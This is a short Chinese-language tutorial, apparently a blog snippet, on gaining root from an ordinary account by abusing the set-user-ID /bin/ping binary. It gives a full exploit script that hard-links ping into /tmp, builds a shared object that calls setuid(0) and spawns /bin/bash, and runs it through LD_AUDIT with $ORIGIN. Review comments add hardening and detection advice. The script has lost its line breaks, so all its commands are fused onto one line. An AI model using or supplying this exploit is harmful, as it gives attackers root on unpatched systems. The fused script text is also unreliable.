1、利用 /bin/ping 的漏洞进行普通用户提权。(此处指权限 rws 中的 s,即 setuid 位:该程序运行时具有属主 root 的有效身份)
[root@localhost ~]# ls -l /bin/ping
-rwsr-xr-x. 1 root root 40760 9月 26 /bin/ping
2、执行以下代码即可:
# NOTE(review): this script lost its line breaks in extraction; every command
# is fused onto the single line below, so as shown it is one comment line.
#
# What the visible commands do, in order: hard-link the set-user-ID binary
# /bin/ping to /tmp/exploit/target, keep it open on descriptor 3, delete the
# directory, build a shared object at the path /tmp/exploit whose constructor
# calls setuid(0) and system("/bin/bash"), then exec descriptor 3 with
# LD_AUDIT set to the literal string $ORIGIN.
#
# NOTE(review): ping is only the carrier; any set-user-ID root binary the
# user can hard-link would serve. The boundary that fails is presumably the
# dynamic loader expanding $ORIGIN in LD_AUDIT for a set-user-ID program --
# confirm against your distribution's glibc advisory and verify the fixed
# package is installed.
#
# Hardening that removes the preconditions visible in the commands:
#   - fs.protected_hardlinks=1 stops an unprivileged user from hard-linking
#     a file they do not own (the `ln /bin/ping ...` step).
#   - Hard links cannot cross filesystems: keep /tmp (and other
#     world-writable directories) on a separate mount, with nosuid,nodev.
#   - Shrink the set-user-ID surface, e.g. ship ping with a file capability
#     (cap_net_raw) instead of mode 4755.
#
# Detection: a set-user-ID file with a link count above 1 is unusual
# (`find / -xdev -perm -4000 -links +1`); also look for shared objects
# created directly under /tmp and for root shells spawned by a process whose
# executable is a network utility.
#!/bin/shunset LD_AUDITrm -r -f /tmp/exploitmkdir /tmp/exploitln /bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targetls -l /proc/$$/fd/3rm -rf /tmp/exploitls -l /proc/$$/fd/3cat > program.c << _EOFvoid __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}_EOFgcc -w -fPIC -shared -o /tmp/exploit program.cLD_AUDIT="\$ORIGIN" exec /proc/self/fd/3unset LD_AUDIT